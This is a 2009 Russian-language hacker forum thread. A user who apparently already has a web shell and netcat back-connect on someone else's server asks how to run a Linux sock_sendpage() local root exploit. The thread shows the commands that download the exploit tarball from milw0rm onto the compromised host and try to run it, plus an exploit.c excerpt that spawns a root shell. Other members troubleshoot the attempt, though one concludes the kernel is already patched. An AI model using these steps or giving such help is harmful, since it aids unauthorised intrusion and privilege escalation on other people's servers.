Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3] |

02.11.2009, 18:36
|
|
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме: 389103
Репутация:
15
|
|
Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]
Скачал сплоит под Linux
http://milw0rm.com/exploits/9641
Помогите разобраться с его использованием.
Необходимо получить рута на
uname -a: Linux 121320-web1.www1.domen.org 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10
EDT 2009 i686
Запускаю netcat и через r57 с помощью back-connect'а получаю консоль, далее:
Cmd line: -l -p 11457
Linux 121320-web1.www1.domen.org 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31
11:01:10 EDT 2009 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
cd /tmp/
mkdir logs
cd /tmp/logs
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
--08:23:23-- http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
=> `2009-linux-sendpage3.tar.gz'
Resolving milw0rm.com... 66.227.17.18
Connecting to milw0rm.com|66.227.17.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,871 (3.8K) [application/x-gzip]
0K ... 100% 3.42 MB/s
08:23:23 (3.42 MB/s) - `2009-linux-sendpage3.tar.gz' saved [3871/3871]
tar xvfz ./*tar.gz
linux-sendpage3/
linux-sendpage3/sesearch-mmap_zero
linux-sendpage3/run
linux-sendpage3/exploit-pulseaudio.c
linux-sendpage3/exploit.c
linux-sendpage3/runcon-mmap_zero
cd ./linux-*
chmod 0777 ./*
ls -lia
total 36
98307 drwxr-xr-x 2 apache apache 4096 Sep 10 20:47 .
98305 drwxr-xr-x 3 apache apache 4096 Nov 2 08:24 ..
98310 -rwxrwxrwx 1 apache apache 358 Sep 10 20:57 exploit-pulseaudio.c
98311 -rwxrwxrwx 1 apache apache 9113 Sep 10 14:36 exploit.c
98309 -rwxrwxrwx 1 apache apache 1127 Sep 10 22:00 run
98312 -rwxrwxrwx 1 apache apache 1068 Sep 10 14:01 runcon-mmap_zero
98308 -rwxrwxrwx 1 apache apache 1018 Sep 6 19:44 sesearch-mmap_zero
sh run
run: line 33: ./exploit: Permission denied
Подскажите пожалуйста что не так делаю?
|
|
|

02.11.2009, 23:45
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
еще раз ls -la и mount сюда
|
|
|

03.11.2009, 08:15
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме: 3660186
Репутация:
905
|
|
Файл exploit скорее всего не является исполняемым
Код:
$ chmod 0755 exploit
|
|
|

03.11.2009, 14:25
|
|
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме: 389103
Репутация:
15
|
|
Понял свой косяк!!! Спасибо за наводку ShAnKaR
Код:
mount
/dev/sda5 on / type ext3 (rw)
none on /proc type proc (rw)
none on /sys type sysfs (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
usbfs on /proc/bus/usb type usbfs (rw)
/dev/sda1 on /boot type ext3 (rw)
none on /dev/shm type tmpfs (rw,noexec,nosuid,nodev)
/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
Теперь выдает:
Код:
sh run
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
Последний раз редактировалось M@rtein; 03.11.2009 в 14:47..
|
|
|

04.11.2009, 22:52
|
|
Новичок
Регистрация: 16.11.2006
Сообщений: 20
Провел на форуме: 589436
Репутация:
14
|
|
Теперь выдает:
Код:
sh run
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
Ну что, теперь открой исходник и посмотри логику, которая ведет к данному сообщению. (капитан очевидность)
|
|
|

05.11.2009, 10:58
|
|
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме: 389103
Репутация:
15
|
|
Ruskey, полагаю в exploit.c возникает в условии, но что подправить я не знаю...
Код:
exploit:
if (s[i][0] == PF_MAX)
exit(EXIT_FAILURE);
if ((out_fd = socket(s[i][0], s[i][1], s[i][2])) == -1) {
perror("socket");
i++;
goto exploit;
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
if (getuid() || getgid()) {
close(out_fd);
i++;
goto exploit;
}
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
|
|
|

11.11.2009, 15:39
|
|
Новичок
Регистрация: 04.09.2009
Сообщений: 23
Провел на форуме: 68004
Репутация:
10
|
|
/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev)
ни о чем не говорит?..
|
|
|

12.11.2009, 01:21
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме: 4646474
Репутация:
1424
|
|
Сообщение от Ex@rcist
/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev)
ни о чем не говорит?..
кажется ты опоздал )
|
|
|

12.11.2009, 18:24
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме: 7875940
Репутация:
2362
|
|
M@rtein
Информация об уязвимости была опубликована 13 августа (патч был сделан в тот же день). А ваше ядро было собрано 31го. Отсюда вывод: рута через этот сплойт не получить.
__________________
включи голову
|
|
|

13.11.2009, 15:55
|
|
Познающий
Регистрация: 09.08.2007
Сообщений: 58
Провел на форуме: 389103
Репутация:
15
|
|
Последний раз редактировалось M@rtein; 13.11.2009 в 16:01..
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|